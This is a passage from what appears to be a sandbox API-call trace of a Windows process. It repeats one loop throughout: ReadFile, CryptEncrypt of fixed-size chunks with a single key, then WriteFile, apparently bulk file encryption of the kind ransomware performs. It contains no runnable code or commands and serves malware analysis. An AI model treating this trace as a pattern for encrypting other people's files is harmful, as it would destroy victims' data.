nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.185] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.185] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.186] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.186] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.187] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.187] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.188] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.188] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.188] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.188] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.188] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.188] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.189] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.189] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.189] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.189] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.189] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.189] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.190] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.190] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.190] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.190] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.190] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.190] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.191] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.191] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.191] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.191] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.191] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.192] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.192] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, 